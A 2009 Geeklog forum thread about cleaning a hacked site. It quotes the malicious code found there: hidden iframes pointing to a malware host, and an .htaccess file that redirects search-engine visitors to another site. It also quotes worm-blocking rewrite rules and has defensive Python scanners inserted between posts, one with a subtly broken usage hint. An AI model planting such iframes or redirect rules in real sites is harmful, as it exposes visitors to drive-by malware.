Posted on: 01/19/09 12:56pm
By: guganbl
I made a gl 1.41 site for my friends in a moto club, and to my great surprise now it has a virus!
I don't know how, I don't know much about gl, but I need advice on what to do......
When I open the site Kaspersky reports:
1/19/2009 4:00:54 PM http://326g.com/forums/includes/hooks/system/index.php//index Internet Explorer Detected: Exploit.JS.Agent.aad
1/19/2009 4:00:54 PM http://326g.com/forums/includes/hooks/system/index.php//index Internet Explorer Denied: Exploit.JS.Agent.aad
1/19/2009 6:48:43 PM http://alink.belstom.ru/partners/system/index.php//index Internet Explorer Detected: Exploit.JS.Agent.aad
1/19/2009 6:48:43 PM http://alink.belstom.ru/partners/system/index.php//index Internet Explorer Denied: Exploit.JS.Agent.aad
I tried to disable all blocks and plugins but it is the same, and even Google reports this site as blacklisted.
Any idea what to do and how to get rid of this stupid thing?
A theory of how this is possible would also help, since if I understand the problem I may be able to fix it.
Is it possible that someone with admin rights had a virus on their computer and the virus migrated to gl somehow?
Thanks for the help
Re: Virus in gl 1.41
Posted on: 01/19/09 02:25pm
By: Dirk
IIRC, there was a series of server breakins a while ago that left JavaScript code in websites. See if you can figure out where it was injected in your Geeklog install (start with the layout directory).
Feel free to contact us through our security contact[*1] if you can't figure it out yourself.
bye, Dirk
Re: Virus in gl 1.41
Posted on: 01/20/09 08:06am
By: guganbl
Well, I have checked the layout folder, I even tried to replace all files (I made a backup of the gl folder in March 2008 so I have all the original files) but it was the same......
I'm thinking about uploading the backup from the March folder and keeping the mediagallery and articles folders from the infected version. What do you think, would it work?
Re: Virus in gl 1.41
Posted on: 01/21/09 11:16am
By: guganbl
Found code in mediagallery/index.php, here it is:
?><html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola19" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe></body></html>
and in public_html\index.php:
?><html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola19" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe></body></html>
I removed this code and now it seems OK, for now no virus report....
Site is on URL:
http://www.banjalukasport.com/marshal/public_html/
So I don't know if it infiltrated more files, but for now I don't get any errors from Kaspersky while browsing the site.
Question is how to prevent this from happening again?
Kind regards,
Sasa
Re: Virus in gl 1.41
Posted on: 01/21/09 11:24am
By: guganbl
Found the same stupid code in \forum\index.php
Re: Virus in gl 1.41
Posted on: 01/21/09 01:57pm
By: Laugh
Quote by: guganbl: Found the same stupid code in \forum\index.php
Unless you know when the hack happened and can restore the files from before that, it is always best to delete all directories and start with fresh files from the install packages.
Once you remove all infected files I believe you can use Google Webmaster Tools to contact Google to get your site off their blacklist.
Re: Virus in gl 1.41
Posted on: 01/21/09 06:35pm
By: guganbl
Huh, I just wanted to go to Google Webmaster Tools to report that the site is OK, and found it again
Here is what happens.......
When I go to the site through this URL:
http://www.banjalukasport.com/marshal/public_html/ , everything is OK, no virus.
But if I go this way http://www.banjalukasport.com/marshal/ I get a virus report and automatically something changes the http://www.banjalukasport.com/marshal/public_html/index.php file, it adds a new line at the end of it.
This is more painful than I thought it would be
:shock:
Re: Virus in gl 1.41
Posted on: 01/21/09 06:43pm
By: guganbl
I'm writing this much here since someone else will have this problem and it will be easier to solve it.
Found it again, in index.php in the geeklog dir. So what I have found until now is that all index.php files were infected. So it is safe to conclude that it has permissions to write to those files somehow.
Does anyone have an idea how to stop this from happening?
I will now continue my SD mission
Re: Virus in gl 1.41
Posted on: 01/21/09 07:35pm
By: Anonymous (alway-guest)
Quote by: guganbl: I'm writing this much here since someone else will have this problem and it will be easier to solve it.
Found it again, in index.php in the geeklog dir. So what I have found until now is that all index.php files were infected. So it is safe to conclude that it has permissions to write to those files somehow.
Does anyone have an idea how to stop this from happening?
I will now continue my SD mission
No idea sir, because it happens only on your site. If other GL users had the same problem as you, they may have reported it to GL headquarters already.
Re: Virus in gl 1.41
Posted on: 01/21/09 08:03pm
By: Laugh
Were those files always infected? Did you scan all text files for the code?
If you are using Windows you can deny modify rights to your website files for your Internet guest user account (the one used by IIS).
Re: Virus in gl 1.41
Posted on: 01/22/09 05:50am
By: guganbl
Hosting is on Linux, and I have found virus code in every file that has the name index.php, for example public_html\index.php, mediagallery\index.php, calendar\index.php, etc........
For now it looks like I removed the code from all files, but I don't know how it got there, so it means that it will happen again.
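An added example, not from this thread or from Geeklog: a small Python scanner that walks a site tree and reports index.php files carrying the two markers seen in the code quoted above, a hidden 1x1 iframe and markup appended after the closing ?> tag. The sample file contents and the example.invalid host are constructed.

```python
import os
import re

# Constructed sample modelled on the injection quoted in the thread: a closing
# PHP tag followed by hidden 1x1 iframes (host is a placeholder).
SAMPLE_INFECTED = (
    '<?php\n'
    'require_once "lib-common.php";\n'
    'echo "hello";\n'
    '?><html><body><iframe src="http://example.invalid/in.cgi?x" width=1 '
    'height=1 style="visibility: hidden"></iframe></body></html>\n'
)
SAMPLE_CLEAN = '<?php\nrequire_once "lib-common.php";\necho "hello";\n'

# An iframe with an absolute src that is 1px or hidden is a drive-by marker;
# Geeklog's own templates never emit one.
IFRAME_TAG = re.compile(
    r'<iframe\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)[^>]*>',
    re.IGNORECASE,
)
HIDDEN_ATTRS = re.compile(
    r'width\s*=\s*["\']?[01]\b|height\s*=\s*["\']?[01]\b'
    r'|visibility\s*:\s*hidden|display\s*:\s*none',
    re.IGNORECASE,
)

def find_injected_iframes(text):
    """Return the src URLs of iframes that are sized 1px or hidden."""
    return [m.group(1) for m in IFRAME_TAG.finditer(text)
            if HIDDEN_ATTRS.search(m.group(0))]

def has_trailing_html(text):
    """True if markup follows the last closing PHP tag, as in the quoted injection."""
    parts = text.rsplit('?>', 1)
    return len(parts) == 2 and '<' in parts[1]

def scan_tree(root, names=('index.php',)):
    """Walk a site tree and map each suspicious file to the iframe URLs found."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in names:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                text = fh.read()
            urls = find_injected_iframes(text)
            if urls or has_trailing_html(text):
                findings[path] = urls
    return findings
```

Run scan_tree() over a downloaded copy of the install after every cleanup; pass names=None-style widening (e.g. every *.php) if the injection turns up outside index.php.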
Re: Virus in gl 1.41
Posted on: 01/23/09 06:26pm
By: Anonymous (govezone)
I too have the same problem described above and I'm hosting with Liquid Web. So they are affecting some kind of security hole, I presume. The tech guys are looking into it as I write this. I'll post results once I figure it out.
Re: Virus in gl 1.41
Posted on: 01/23/09 07:11pm
By: guganbl
It happens again and again, every time I clean all files after some time they are affected again. I really don't know how this is possible..... I'm hosted with GoDaddy, and I'm gonna ask their tech support also. Maybe it will help to figure out what is happening...... If you get any news please share, and I will do the same.
Regards
Sasa
Re: Virus in gl 1.41
Posted on: 01/23/09 07:32pm
By: guganbl
Just now I found something strange: I found a file named .htaccess in the gl root and in public_html
with this content:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://j-5.info/2/go.php?sid=2 [R,L]
These files were not here before as far as I remember, but I don't know what this means. Could this be the reason someone can change my files?
I know that the .htaccess file in the root of my hosting has something to do with permissions, but I don't know what these two files are doing in my gl?
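An added example, not part of the thread: a Python check that parses .htaccess rewrite rules and flags the pattern of the file quoted above, a RewriteRule that redirects visitors arriving from search-engine referrers to another host. The site owner, typing the URL directly, never triggers it, which is why the redirect goes unnoticed. The sample .htaccess and the redirect-host.invalid target are constructed.

```python
from urllib.parse import urlparse

# Constructed sample with the same shape as the rogue .htaccess from the thread.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://redirect-host.invalid/go.php?sid=2 [R,L]
"""

SITE_HOST = 'www.banjalukasport.com'  # the site's own hostname, from the thread

def parse_rewrite_rules(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    rules, conds = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('RewriteCond'):
            parts = line.split(None, 3)  # keyword, variable, pattern, [flags]
            conds.append((parts[1], parts[2]))
        elif line.startswith('RewriteRule'):
            parts = line.split(None, 3)
            flags = parts[3].strip('[]').split(',') if len(parts) > 3 else []
            rules.append({'pattern': parts[1], 'target': parts[2],
                          'flags': [f.strip() for f in flags], 'conds': conds})
            conds = []
    return rules

def find_cloaked_redirects(text, site_host):
    """Return targets of rules that send referrer-matched visitors off-site.

    Signature: a condition on HTTP_REFERER, an absolute target on another
    host, and an R (redirect) flag. Each hit is a review item, not a verdict.
    """
    suspicious = []
    for rule in parse_rewrite_rules(text):
        if not any(var == '%{HTTP_REFERER}' for var, _ in rule['conds']):
            continue
        target = urlparse(rule['target'])
        redirects = any(f == 'R' or f.startswith('R=') for f in rule['flags'])
        if redirects and target.scheme and target.hostname != site_host:
            suspicious.append(rule['target'])
    return suspicious
```

The referrer-spam rules in the root .htaccess quoted later in the thread (redirecting to http://127.0.0.1/) match the same signature, so a hit means "read this rule", not "this rule is malicious".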
Re: Virus in gl 1.41
Posted on: 01/23/09 07:35pm
By: Chrispcritters
This sounds more like your hosting account has been compromised than a Geeklog issue. Have you checked your logs with your host? Have you changed your hosting account password?
Re: Virus in gl 1.41
Posted on: 01/23/09 07:38pm
By: guganbl
I'm gonna do that right now, and I wrote an e-mail to the hosting tech support...
Re: Virus in gl 1.41
Posted on: 01/23/09 07:57pm
By: guganbl
I think I know what the problem is, my original root .htaccess file also looks strange, but I don't have a backup of the old one, so I need some help to fix it. Here is what is inside:
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
# attempts to stop the Santy worm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_COOKIE}% s .*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
# Referrer spam :-(
RewriteCond %{HTTP_REFERER} ^http://.*hosting4u.gb.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://.*4free.gb.com.*$ [NC]
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
ErrorDocument 404 /404.php
Redirect 403 /sport/config.php
Redirect 403 /buk/config.php
Redirect 403 /geeklog/config.php
Redirect 403 /marshal/config.php
At the end are the dirs of my four gl sites, one of them is compromised for now, but how do I fix this file, please help :shock:
Re: Virus in gl 1.41
Posted on: 01/24/09 02:57am
By: Dirk
Sorry for not having the time to look into this earlier. Seems like you pretty much figured things out with the help of others already. I agree with Chrispcritters (and said as much in my original response): This looks like your hosting account - or maybe even the entire server - has been compromised. You may want to contact your hosting service.
Quote by: guganbl: At the end are the dirs of my four gl sites, one of them is compromised for now, but how do I fix this file, please help :shock:
Geeklog itself doesn't really require a .htaccess file, so you could simply delete it.
Some of the rules you quoted look like they came from this post[*2]. They can help reduce the server load but are not strictly necessary.
I'd say start over with a fresh .htaccess (once you know what actually happened and can be sure it won't happen again) and then add rules as you need them.
bye, Dirk
Re: Virus in gl 1.41
Posted on: 01/24/09 03:28pm
By: guganbl
I figured out almost everything, I still didn't get an answer from my hosting support (it's written that they will answer in 8 hours, but it's been more than 24 already) and the only thing I'm not sure is OK is this .htaccess file that I have.
So if you could look over it, it would be a great help, just to eliminate the chance that there is an error there.
Kind regards
:shakehands:
Re: Virus in gl 1.41
Posted on: 01/25/09 01:23pm
By: guganbl
OK, here is the conclusion, just to help in case someone else is in the same kind of trouble:
The FTP account that had access to this infected gl installation was compromised. The person that used that account had a virus on his computer and I guess that it sent its secrets somewhere.
Someone was clever enough to put an .htaccess file in the gl folder and with that gained access to some gl files, and whenever I fixed them they were soon infected again. So the cure was to remove that .htaccess file, download the gl directory to my computer and scan it with antivirus software. Then look at the AV log and go file by file and remove the virus code or replace the file.
For now it worked, second day and no virus reported.
Thanks everyone for the help
:shakehands:
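An added example, not from the thread: the repeated reinfection described in the conclusion is easiest to catch with a file-integrity baseline taken right after a cleanup (or from the pristine install package), then compared against the live tree on a schedule. This Python snippet builds and diffs such SHA-256 manifests; the in-memory snapshots under __main__ are constructed.

```python
import hashlib
import os

def manifest_from_items(items):
    """Build {relative_path: sha256_hex} from (path, bytes) pairs."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in items}

def walk_tree(root):
    """Yield (relative_path, content_bytes) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                yield os.path.relpath(path, root).replace(os.sep, '/'), fh.read()

def build_manifest(root):
    """Snapshot a freshly cleaned install; store the result off the server."""
    return manifest_from_items(walk_tree(root))

def compare_manifests(baseline, current):
    """Modified entries are reinfection candidates (the appended index.php
    lines in the thread); added entries catch dropped .htaccess files."""
    return {
        'modified': sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
        'added': sorted(p for p in current if p not in baseline),
        'removed': sorted(p for p in baseline if p not in current),
    }

if __name__ == '__main__':
    # Constructed snapshots standing in for two runs over the same site tree.
    before = manifest_from_items([('index.php', b'<?php\n'),
                                  ('forum/index.php', b'<?php\n')])
    after = manifest_from_items([('index.php', b'<?php\n?><html></html>\n'),
                                 ('forum/index.php', b'<?php\n'),
                                 ('.htaccess', b'RewriteEngine On\n')])
    print(compare_manifests(before, after))
```

Keep the baseline manifest on a machine the compromised FTP credentials could not reach, otherwise an attacker who can rewrite index.php can rewrite the manifest too.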